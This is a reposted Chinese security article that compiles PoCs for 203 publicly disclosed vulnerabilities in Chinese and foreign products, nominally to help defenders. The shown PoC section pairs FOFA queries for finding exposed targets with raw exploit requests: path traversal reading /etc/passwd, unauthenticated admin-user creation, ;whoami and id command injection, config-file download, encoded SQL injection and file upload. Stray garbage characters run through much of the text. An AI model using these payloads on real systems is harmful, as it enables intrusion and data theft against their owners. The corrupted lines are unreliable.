互联网公开漏洞整理202309-2024069 h5 B7 i2 G) i: F8 W
道一安全 2024-06-05 07:41 北京7 m! l' [; p2 e5 E- C2 s7 x6 Y* J
以下文章来源于网络安全新视界 ,作者网络安全新视界
% h/ E3 W! U: m4 K# b9 c- D( P- Y8 U- H+ C( k
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
7 S. f, ^% `8 T. l' \
. D. ~2 `- |8 m6 d漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
+ t$ n. W" U4 L0 ~$ w1 k# y
$ p: |! d' g$ X( N- J: w% F7 T安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。2 E2 i2 |: k% n! k. K
' z4 p; | q D- u' Z* \5 K文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
3 P5 {6 [! S% u3 h7 Q0 f% ?
! z3 S0 ^/ y; }- L' E5 k合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
; ?# f3 ]$ D5 h: ?+ G5 C; i% ]# R4 W- B; u9 b8 v" r6 I
" l# K5 A; E' g: R6 t6 H# j/ y声明! h3 _, K" F9 `+ |( B! C
- e6 C& i) _% j. _7 j9 s! S6 Q$ I为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。: ^6 }! l; P: ~' g1 H6 i
' Z) V( y2 {! R5 V$ b5 R* E( A有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
+ J) v4 \$ `" ?4 E: h: n0 h2 m
" X& k6 h; D2 M9 Y' m. ]$ _2 b% T" I
0 |6 s& C# J* B2 C8 z
目录5 g" y+ f" h4 ?% S8 u- B
' G+ F$ i. i" p01, w! F8 m- |. Y3 ] ?
5 f" ~' @! X8 H' k# j. e: y/ ~8 @1. StarRocks MPP数据库未授权访问
( y' `" v" k7 T* n T2 e2. Casdoor系统static任意文件读取$ B' q. R# u, K4 s# I; _4 k s4 e
3. EasyCVR智能边缘网关 userlist 信息泄漏9 Y, Z' b- w M
4. EasyCVR视频管理平台存在任意用户添加
) T4 g9 U! V9 Q( s1 v2 @' }2 [1 u5. NUUO NVR 视频存储管理设备远程命令执行
0 A6 Z5 x1 i8 w( W8 L6. 深信服 NGAF 任意文件读取
& y) I+ B9 d! ~8 A n1 U7 B7. 鸿运主动安全监控云平台任意文件下载) P4 ^4 h3 F# |6 j6 k
8. 斐讯 Phicomm 路由器RCE
+ s# n6 w3 j8 {4 ?+ f6 i& Y9. 稻壳CMS keyword 未授权SQL注入
' g- u3 b' B# _# }9 C% B10. 蓝凌EIS智慧协同平台api.aspx任意文件上传3 N( ] K/ e; U2 z3 p
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入, r+ u' H1 r" a$ [; j& [( h* ?( b
12. Jorani < 1.0.2 远程命令执行
* R1 q7 y6 j5 [! D/ |13. 红帆iOffice ioFileDown任意文件读取1 _. R+ m/ k" O1 D9 \! M# t0 k# w
14. 华夏ERP(jshERP)敏感信息泄露
9 `) u$ D: F7 T2 ^15. 华夏ERP getAllList信息泄露
" Q; o/ V" J. @1 q9 g# i$ A% _& i16. 红帆HFOffice医微云SQL注入% U2 p6 y! G) t" d5 [9 Y y3 w
17. 大华 DSS itcBulletin SQL 注入" H6 R1 f8 l, U" ?8 q, b& S% H
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
* N9 X& d" `( `" z1 V8 B19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
+ S0 ^/ Y% p& H9 d20. 大华ICC智能物联综合管理平台任意文件读取. t" h9 s W. D) t' i2 n9 x
21. 大华ICC智能物联综合管理平台random远程代码执行1 Q+ l9 n s5 ?- a5 R2 z# ?
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
$ W) Y8 f& z1 q$ r) ?23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
; R+ o' H3 k) V2 f! d24. 用友NC 6.5 accept.jsp任意文件上传* ?: h" d4 l7 r3 X4 V t9 M
25. 用友NC registerServlet JNDI 远程代码执行# ~ B7 r8 F* E2 z' c' S0 E
26. 用友NC linkVoucher SQL注入
7 F) F; l, c, N27. 用友 NC showcontent SQL注入
% d& R. W7 G# `: I28. 用友NC grouptemplet 任意文件上传; f6 U% R4 j' e# J
29. 用友NC down/bill SQL注入
9 `! m2 S( g1 m/ c' r+ S3 I30. 用友NC importPml SQL注入. X1 _+ \) z5 t! n
31. 用友NC runStateServlet SQL注入7 r A" g' J" i
32. 用友NC complainbilldetail SQL注入
2 b0 [+ {: P3 ? F% q7 J8 ~9 H33. 用友NC downTax/download SQL注入8 W4 `9 M- w# f# s( f
34. 用友NC warningDetailInfo接口SQL注入$ v( O2 z H3 D, g1 g+ R. m
35. 用友NC-Cloud importhttpscer任意文件上传
& z& z8 L. r( I& }36. 用友NC-Cloud soapFormat XXE
, b# o- F. |, j1 m1 g: q37. 用友NC-Cloud IUpdateService XXE/ v9 i/ j- ~7 k! W! l0 L
38. 用友U8 Cloud smartweb2.RPC.d XXE8 l" x+ C0 l- V- q' N
39. 用友U8 Cloud RegisterServlet SQL注入
P$ c1 c! `. D2 T6 m40. 用友U8-Cloud XChangeServlet XXE
* J% M+ w. |) w4 L41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
$ U0 R* z8 e6 s42. 用友GRP-U8 SmartUpload01 文件上传+ R4 f# r" }. \$ l2 V9 v
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
/ a& C2 u1 x$ ?6 h0 d5 ^" d/ A44. 用友GRP-U8 bx_dj_check.jsp SQL注入+ s4 I. C4 y" w) _6 `5 i
45. 用友GRP-U8 ufgovbank XXE( ^) {* o3 d" I8 T' u; b6 W- h
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
. W2 V! A3 ^0 v' B+ S8 d47. 用友GRP A++Cloud 政府财务云 任意文件读取) L& q& \) O0 o: y' _% p
48. 用友U8 CRM swfupload 任意文件上传
; z3 v% d9 {- F8 t5 i# y2 j) l3 U49. 用友U8 CRM系统uploadfile.php接口任意文件上传3 _' L& Y4 t s+ E% G$ e
50. QDocs Smart School 6.4.1 filterRecords SQL注入" h# @' S6 Y& x+ }) U1 S
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
$ ?( r8 `/ u0 v y% E2 I3 L52. 泛微E-Office json_common.php sql注入
4 I( u* M. P+ y53. 迪普 DPTech VPN Service 任意文件上传
3 [9 d9 ]+ H3 O54. 畅捷通T+ getstorewarehousebystore 远程代码执行( Y+ ?3 n' s$ T# t
55. 畅捷通T+ getdecallusers信息泄露1 {4 D, E: A& V/ w- ]& u9 G
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE, p0 K7 z+ g% Z# Q
57. 畅捷通T+ keyEdit.aspx SQL注入) }* p+ p1 U& p) f* Y6 R
58. 畅捷通T+ KeyInfoList.aspx sql注入
9 q! j9 A. L, Y0 ~59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行" u# m7 ?, p- w1 D0 e
60. 百卓Smart管理平台 importexport.php SQL注入# y8 G, p1 Y7 I& S/ b, f
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传' o* l5 O2 _, Y6 R* g
62. IP-guard WebServer 远程命令执行
0 }5 ]7 s8 n. Q+ e( C63. IP-guard WebServer任意文件读取
/ \/ p1 ]6 o9 I$ C$ K3 ]" ]- J6 r64. 捷诚管理信息系统CWSFinanceCommon SQL注入( V* h+ ^1 Q& p# p# _" t, R% n
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
# S. ]2 C( G5 R66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入9 ?5 g3 `; x0 \$ @
67. 万户ezOFFICE wpsservlet任意文件上传+ ]$ C* e; n# b7 ?7 {. Z' i
68. 万户ezOFFICE wf_printnum.jsp SQL注入8 r( b$ c1 S/ S* a
69. 万户 ezOFFICE contract_gd.jsp SQL注入
8 }9 Y7 e- D) S5 T8 T70. 万户ezEIP success 命令执行! v3 h4 d% V2 M
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入9 A/ v. s0 [6 m- p% n2 @/ J. s
72. 致远OA getAjaxDataServlet XXE
$ T5 m5 h: O$ {+ E; n( \73. GeoServer wms远程代码执行
( r) g! ?& `8 O- T" O/ j74. 致远M3-server 6_1sp1 反序列化RCE) e6 @# Q2 o E2 x4 P' @
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE: h2 l: Y8 `5 e+ v w6 n; c
76. 新开普掌上校园服务管理平台service.action远程命令执行
" T, k. Y/ t- V1 n+ ~7 q7 p# X2 ?+ M77. F22服装管理软件系统UploadHandler.ashx任意文件上传4 a9 _: k/ {* N; i' _; T, o1 d
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
/ K* @' q, u. }5 T* {2 X1 N79. BYTEVALUE 百为流控路由器远程命令执行9 A- \7 Q/ @7 t; |& q) r+ a
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传" G' p- K9 u8 E$ C6 a) h1 z
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
$ Q# ?. G+ | ~, l ?4 Y7 @3 _82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
# q8 G, L/ n* W- a5 S s' F8 h83. JeecgBoot testConnection 远程命令执行1 r) }7 j# C8 I
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
( R' r7 j* Q9 D$ L85. SysAid On-premise< 23.3.36远程代码执行' }3 U& ^ g/ K' M2 O/ L
86. 日本tosei自助洗衣机RCE
. d5 H m& i$ F: d87. 安恒明御安全网关aaa_local_web_preview文件上传. T/ K% F! _: ?/ a8 ]5 f$ H
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
l! Q$ v% a: M: s# a; a A1 F( }( t89. 致远互联FE协作办公平台editflow_manager存在sql注入0 R8 A x& b) O3 W1 a
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行, ^7 j9 K3 S* M7 b: i1 E
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取 z' j2 i3 D% G& j4 I1 H
92. 海康威视运行管理中心session命令执行5 ^& i1 U2 n5 [0 @: y( E
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传# d( G& r8 `) ^; M# a9 F
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传! g8 I% T( }) X J: ]6 K7 B' }4 B
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行/ m3 s1 m$ R" u0 @. j
96. Apache OFBiz 18.12.11 groovy 远程代码执行
2 Y' B- M0 m ?97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
6 A3 L* A/ y. \' s5 S$ s N98. SpiderFlow爬虫平台远程命令执行
& {9 F& z7 I, l5 R. W2 L9 O8 R99. Ncast盈可视高清智能录播系统busiFacade RCE% U+ `. T! h- q
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传& [1 \1 r% P8 P. e9 R% Z( ]
101. ivanti policy secure-22.6命令注入5 `4 @3 R. U5 w% N% X' e
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行$ Y6 |) [9 c; ^7 O8 T, |, S# Q
103. Ivanti Pulse Connect Secure VPN XXE
) Y1 b2 X2 } Z104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露' l+ |6 q7 P& r* H9 W7 e0 v
105. SpringBlade v3.2.0 export-user SQL 注入0 v% g3 Z- A* y: c
106. SpringBlade dict-biz/list SQL 注入: ]8 i! v4 T6 N4 Q# V! T# e6 T
107. SpringBlade tenant/list SQL 注入" J+ G0 y) z1 o* a# z
108. D-Tale 3.9.0 SSRF0 t1 E: p1 S2 F% O
109. Jenkins CLI 任意文件读取
+ {" X: \# s6 S M6 Z& n/ W110. Goanywhere MFT 未授权创建管理员/ g% [$ |/ b* N t3 j) b
111. WordPress Plugin HTML5 Video Player SQL注入
% }0 b/ m+ s5 j' N112. WordPress Plugin NotificationX SQL 注入7 _( `6 I; ]# _( s! b% x
113. WordPress Automatic 插件任意文件下载和SSRF
3 ]/ h) D- T) G5 M- ^114. WordPress MasterStudy LMS插件 SQL注入
; u- ~, |$ b1 _2 R115. WordPress Bricks Builder <= 1.9.6 RCE
7 M# @* p6 O2 k" Q+ Y; f116. wordpress js-support-ticket文件上传& Q( ^$ J: Q" d- B0 J2 d. _
117. WordPress LayerSlider插件SQL注入
- y0 D, D( `( y* c118. 北京百绰智能S210管理平台uploadfile.php任意文件上传4 D7 L( ~5 B# Y" o; Z8 z
119. 北京百绰智能S20后台sysmanageajax.php sql注入
; s0 l% H' A; O/ N! I9 y* J' \120. 北京百绰智能S40管理平台导入web.php任意文件上传% @2 B$ s! `' E" u
121. 北京百绰智能S42管理平台userattestation.php任意文件上传: C. b1 S/ h' i$ J F; e4 s
122. 北京百绰智能s200管理平台/importexport.php sql注入
; q1 t+ L$ h2 |3 c# Y5 V2 E123. Atlassian Confluence 模板注入代码执行$ r$ Y8 G% a9 V- I4 C6 H
124. 湖南建研工程质量检测系统任意文件上传
) j& n. |# V4 d1 z+ G125. ConnectWise ScreenConnect身份验证绕过
) x/ |. v$ K( W. S126. Aiohttp 路径遍历
" f( R0 E: O; d c2 {127. 广联达Linkworks DataExchange.ashx XXE
. V2 N E) a O; q8 p128. Adobe ColdFusion 反序列化
& ?/ T& U( l2 q129. Adobe ColdFusion 任意文件读取& _0 i& g6 Q! h" M
130. Laykefu客服系统任意文件上传6 R5 m) J% r! V. C; a4 G! x5 o2 h
131. Mini-Tmall <=20231017 SQL注入
- q- l$ k; z5 M1 b132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
5 J& I3 e; {6 W3 K( F9 Z* g: d133. H5 云商城 file.php 文件上传 O; k8 k8 V \4 r( ^" e" v
134. 网康NS-ASG应用安全网关index.php sql注入- \' |/ Y! u3 i. R9 z+ r
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入. l# f3 x1 A5 v) w# f
136. NextChat cors SSRF
4 ]. i! I/ S" g8 E1 w4 |% G137. 福建科立迅通信指挥调度平台down_file.php sql注入
6 l6 T; G- ]( Z0 i! n0 L138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
8 z- N1 \/ P) W! x3 E2 T/ E6 ^4 e139. 福建科立讯通信指挥调度平台editemedia.php sql注入3 L! ]$ o0 c! `2 ?
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
3 N2 b) i5 ]9 W$ N9 J. s( u141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入' f7 x4 t* ]3 q, F& n
142. CMSV6车辆监控平台系统中存在弱密码) U7 g, ]1 U: O1 B
143. Netis WF2780 v2.1.40144 远程命令执行
# I5 J" Q" n: g! {* a6 Y144. D-Link nas_sharing.cgi 命令注入
0 P2 y8 q6 s6 l1 b3 V3 N- R145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
2 L; C6 s# t' R! {146. MajorDoMo thumb.php 未授权远程代码执行1 x& B+ o' b& T k- m& @$ d$ W
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历. P& L& C, O( f1 U1 }* T. w, o1 b
148. CrushFTP 认证绕过模板注入8 \) H1 d9 r- z3 z# Z$ M
149. AJ-Report开源数据大屏存在远程命令执行/ }4 U% ]% i' F# |, B7 H
150. AJ-Report 1.4.0 认证绕过与远程代码执行
4 N4 v4 D# P1 T! p) _0 ?$ C151. AJ-Report 1.4.1 pageList sql注入
' @/ E+ \( H6 k' j3 ?: A8 ?4 v152. Progress Kemp LoadMaster 远程命令执行
0 U$ J/ B+ @8 e" g4 L% C, D2 a8 J153. gradio任意文件读取6 W, A4 A- f& w- } X4 b
154. 天维尔消防救援作战调度平台 SQL注入# j8 @/ `! L7 R8 m. ^
155. 六零导航页 file.php 任意文件上传
0 R5 y0 [" A# y4 h156. TBK DVR-4104/DVR-4216 操作系统命令注入
5 T2 D8 t" w7 ?7 g" _157. 美特CRM upload.jsp 任意文件上传3 _9 G7 Q6 e" t1 V
158. Mura-CMS-processAsyncObject存在SQL注入 q8 b+ f$ n# s8 R0 X$ _/ p
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传7 D9 |; U' B& G' S* Q) t& {* @) X& W
160. Sonatype Nexus Repository 3目录遍历与文件读取! g$ I2 u& Z( T& b! Y1 _0 ^! ?4 _
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传. @, L5 A, e- @$ C L& h1 z3 _
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
. u+ U3 u. T! `+ r! `' N# [163. 号卡极团分销管理系统 ue_serve.php 任意文件上传; ^& [5 i& W5 M0 m9 y. x
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
& R& L( c% `7 ^8 m& R: J165. OrangeHRM 3.3.3 SQL 注入; T! d4 |& u# Z# H& D
166. 中成科信票务管理平台SeatMapHandler SQL注入
# o; I- @' ^* F& D% N5 m167. 精益价值管理系统 DownLoad.aspx任意文件读取6 ^+ C2 @' |- D# E, N# ]6 j* y3 `
168. 宏景EHR OutputCode 任意文件读取
/ i! k4 @5 O$ ?; B+ c169. 宏景EHR downlawbase SQL注入: u" n8 p" _3 z; E1 f
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
7 h) }. L3 v# `9 \7 W171. 通天星CMSV6车载定位监控平台 SQL注入
6 Z7 z. V5 i4 ~* T4 Z172. DT-高清车牌识别摄像机任意文件读取
5 Z$ v! e+ }) a7 w5 t% d; O5 F173. Check Point 安全网关任意文件读取1 `: W: C' {/ o. k4 M
174. 金和OA C6 FileDownLoad.aspx 任意文件读取: s$ }# I) D2 \) \8 q
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
! ^' y* j* u5 a- K1 k176. 电信网关配置管理系统 rewrite.php 文件上传$ i: C f9 `$ m4 j0 }0 n' X' x
177. H3C路由器敏感信息泄露
% t2 {2 A) U' e- X3 T$ U7 @+ z, C178. H3C校园网自助服务系统-flexfileupload-任意文件上传3 B3 {0 [. |, E" U1 [/ f5 v" P
179. 建文工程管理系统存在任意文件读取
, k u L6 _7 ^ O( m; g E180. 帮管客 CRM jiliyu SQL注入
! r1 p+ k) A+ Q" ^ K" \3 E' ~# d181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
# o6 X1 D% D( y* N182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
; A; Y/ t3 s/ {5 C: p183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
$ ~' P" L9 E( _8 g. F184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
; N9 S9 n' t! p1 e! C! o. x( ~185. 瑞友天翼应用虚拟化系统SQL注入0 ]. k; ?& H+ G+ e6 c: \
186. F-logic DataCube3 SQL注入7 M, `' S* N' z" c4 B$ |& ]% z
187. Mura CMS processAsyncObject SQL注入
- ], G/ o! a( Q8 w5 a& j( @188. 叁体-佳会视频会议 attachment 任意文件读取
. k) j K! O- o, u9 R6 D6 B189. 蓝网科技临床浏览系统 deleteStudy SQL注入 t0 ?( H9 u B4 F
190. 短视频矩阵营销系统 poihuoqu 任意文件读取7 {8 \/ v! V# Y( V, Y! Z
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
7 x. f: ?; Q& I192. 富通天下外贸ERP UploadEmailAttr 任意文件上传, U c7 G% v4 ?4 @
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
( O/ F- P# T1 P# e0 u* t194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
: l3 j9 `/ O! G: k Z9 N! `+ w195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
4 O6 ~8 _: y; C1 O196. 河南省风速科技统一认证平台密码重置
7 w* C J) j/ n9 @/ t197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入% l: |) m5 Z( e1 [& ^( p& G5 k% {
198. 阿里云盘 WebDAV 命令注入
2 O# Y* b- X }% _5 j. b3 ~& L199. cockpit系统assetsmanager_upload接口 文件上传
8 |3 S& m! p m) I5 n/ v200. SeaCMS海洋影视管理系统dmku SQL注入% @( U) G0 U& ?6 u8 W* u
201. 方正全媒体新闻采编系统 binary SQL注入* _1 y1 y( J! s n8 H; u' w
202. 微擎系统 AccountEdit任意文件上传- v7 C& U8 K* V5 k( t$ j) [$ S0 \ S
203. 红海云EHR PtFjk 文件上传
: u; ^2 g8 M& t ^
( \( e9 l s- S5 ^% V! P0 r f5 x$ ~POC列表
- P& l: H- i+ T v5 s0 l9 O5 m: f# [! n3 v9 |# N1 _. I/ A
02, j7 n; d: }7 {- Y! `9 ^
4 c7 _) E6 u" U( G- v/ F9 E1. StarRocks MPP数据库未授权访问
& j9 ?2 ]; O) e) L0 Y7 H/ P5 mFOFA :title="StarRocks"
, f7 `: N. o' r& E+ eGET /mem_tracker HTTP/1.1/ d- ^: |! Q/ g4 g$ h& d0 ~
Host: URL, s' ]- l2 F+ n1 S6 l3 M
1 Q; r0 o5 t$ y8 F7 v4 f9 {9 a; _# Q
6 a9 O) p2 }& ~2 W2. Casdoor系统static任意文件读取0 u, f8 _3 A& \$ w9 F6 j/ V
FOFA :title="Casdoor". x: s4 z' s" M& E
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1& X, ]5 F# [; T; f5 c% X
Host: xx.xx.xx.xx:9999/ T" p: c9 }% o6 y6 D7 P6 Y! u2 q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
$ m" [; c: e" _1 g5 d8 E: GConnection: close
$ [1 [/ E$ j5 l# i5 R' ?# q; qAccept: */*! [/ G/ S$ @4 b
Accept-Language: en4 Y, j' r+ E7 [0 D* S& i3 Q# C
Accept-Encoding: gzip- e; U: L8 m7 b. t
3 x9 c" C5 o) t) k P$ i7 W
7 _+ G c/ U+ ]& J' b3. EasyCVR智能边缘网关 userlist 信息泄漏* J; m2 k$ G% B9 U% h0 \ t
FOFA :title="EasyCVR") a" X* Z6 m2 M6 @1 L7 H
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
5 S1 b' Z9 T& p5 [9 nHost: xx.xx.xx.xx
+ h) @/ [ o8 q; ?4 ~( ^& t
( c) F% w# ^! Z3 f! T, P6 c3 ~4 U; c+ [
4. EasyCVR视频管理平台存在任意用户添加
* k) q6 ]6 F& d/ x6 D* x- K# XFOFA :title="EasyCVR"
: K! g; Z$ D1 P0 H, Q0 f/ r6 }) \# S3 `+ B1 @2 o- S9 s
password更改为自己的密码md5
. h' s @/ p% D$ MPOST /api/v1/adduser HTTP/1.14 p2 e% K; x, K( o
Host: your-ip- A- w* X8 N7 D0 \
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
2 ]9 @+ v7 l9 C1 I: ]+ V9 b' l6 z; z/ L2 f) \9 T- p
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
6 T1 ]- O- \3 N( T" i& R
/ j* n4 }0 Y5 v6 V$ e& S; z; Z$ h9 m
* [! ]6 T$ Q7 d9 \+ }* W5. NUUO NVR 视频存储管理设备远程命令执行) ~: r( o; v: Y( U' f w& ~
FOFA:title="Network Video Recorder Login"
9 X/ k- Q- Z/ D9 A2 A. [; J; FGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1, K6 N+ k& x' G6 x
Host: xx.xx.xx.xx
+ O' z! i1 v' e* ]- f$ {+ n3 ~4 L' b5 A$ X* P' Q; G
T; | S) ?, o6 r& u9 K6. 深信服 NGAF 任意文件读取
# F* I& x3 r2 h2 h( Y. BFOFA:title="SANGFOR | NGAF"
+ L9 n& R# G" H; h' u; oGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
: y& }2 J/ }$ Q( l9 a$ ~* RHost:
& C8 q E3 X. O; ]1 Q' _# g) j
/ z$ U( S$ _& o" {9 W+ r- s5 \0 C! U' M. O+ v
7. 鸿运主动安全监控云平台任意文件下载
) ^7 a- w9 a' G+ G! b( h/ i& MFOFA:body="./open/webApi.html"- }( Y; p/ M( f. I4 U. ~
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.19 `* x6 Q8 Z: Y9 {" Z) o& v4 Z
Host:. B8 g$ p- g) q; G' A# J) L. @8 [
5 y0 s: {/ c$ U7 A$ m2 ?
7 J0 E, W. H. g7 R
8. 斐讯 Phicomm 路由器RCE
+ P' R7 N$ {' o/ l7 g# |- `FOFA:icon_hash="-1344736688"! \2 [. h/ R& Y5 B. G$ U
默认账号admin登录后台后,执行操作5 I3 p" V2 j7 S& n. t: N
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1/ e6 f+ E# a% P
Host: x.x.x.x6 R" \$ Z n, q( k. t$ Z( r
Cookie: sysauth=第一步登录获取的cookie0 J5 Z, Q7 @, {% N
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz" a$ L) y0 H; k- W$ ?. O% s/ o
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36% k3 ], ?. B# C
# p: S: j* a! ~& \1 D------WebKitFormBoundaryxbgjoytz
- k v( a1 v; L- oContent-Disposition: form-data; name="wifiRebootEnablestatus"' o# W- a2 ~3 [. V
: O. |* _' M+ ^. x
%s
1 e3 {2 a }* f5 x, f+ ^/ }------WebKitFormBoundaryxbgjoytz% ^6 l! A2 P3 |; x/ c1 G' a
Content-Disposition: form-data; name="wifiRebootrange"3 S7 K1 ^+ s+ D( ?. r
0 [! ^ a; o2 W8 I. D( z% h% J" ~12:00; id;4 C; O* s/ H% u1 D5 k+ Y& c, R
------WebKitFormBoundaryxbgjoytz
6 J% m" O- @- ]+ s7 hContent-Disposition: form-data; name="wifiRebootendrange"
5 ^0 p& V3 a+ a8 J9 _. r6 q) Y8 W0 t( x
%s:7 F; ]# v4 G( H' f) t4 i5 w
------WebKitFormBoundaryxbgjoytz
+ @+ F, u K hContent-Disposition: form-data; name="cururl2", i% B8 e8 v9 \% m A; i' I
/ C, n2 K; a! O; i$ n) T% V, z% M
" U: K3 K) h1 o+ ^# e! s1 M------WebKitFormBoundaryxbgjoytz--
* J. p2 F1 \/ u/ H9 v7 f+ U! h& s E
5 n; [1 N# p! w9. 稻壳CMS keyword 未授权SQL注入
! R3 ^$ z; s" n% V8 pFOFA:app="Doccms"6 E0 `4 E& \" f
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
; U. z5 ~5 X$ W1 e- X/ ^/ J( XHost: x.x.x.x; ~0 E- m8 g* B+ W: j
7 c& H; q' X3 R F
+ U" V+ |) U3 o5 [' fpayload为下列语句的二次Url编码. D1 \! b# P! N& A
* [7 D6 y3 e' W' W* u0 C. U' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
7 q1 O4 P# S3 A4 b
: y. O: ^) I V' Z, N5 N10. 蓝凌EIS智慧协同平台api.aspx任意文件上传9 y7 ]1 q$ u2 D# D* g' o* `
FOFA:icon_hash="953405444". e' v6 g* \- J' _5 ]8 I9 |
) {) m0 ]" n4 U" J! T
文件上传后响应中包含上传文件的路径
3 Q* ]- r( [; f4 K% [2 I8 DPOST /eis/service/api.aspx?action=saveImg HTTP/1.1
8 e# B/ V) L3 `) f7 lHost: x.x.x.x:xx. X. q9 C) t8 J5 `" Y Q1 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 s: b6 m$ b8 I, `+ `
Content-Length: 197, j* X9 S8 d+ A, `- M: U+ E* ^) v' Z9 y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 e) O7 A+ J+ k. p6 u: h6 _) {
Accept-Encoding: gzip, deflate# u% r7 E8 {8 |, L' w; u% }
Accept-Language: zh-CN,zh;q=0.9
% X5 C8 @1 W! g% _2 w X1 ZConnection: close
1 W4 M4 D' T! b* P) e% I$ D; F8 aContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
9 Z0 [) H8 A P! ]9 L
* g7 m2 ^6 b* P# A* G4 r: A1 T! Z------WebKitFormBoundaryxdgaqmqu
( Y& V) L4 h6 Q' P' Z$ M. y0 iContent-Disposition: form-data; name="file"filename="icfitnya.txt". ]/ A' v( a/ W E. ?6 S
Content-Type: text/html
$ Z- H; Q# T& o
0 s' T! C6 U$ m4 x2 o7 @jmnqjfdsupxgfidopeixbgsxbf/ y( C; i6 p8 h+ _ T
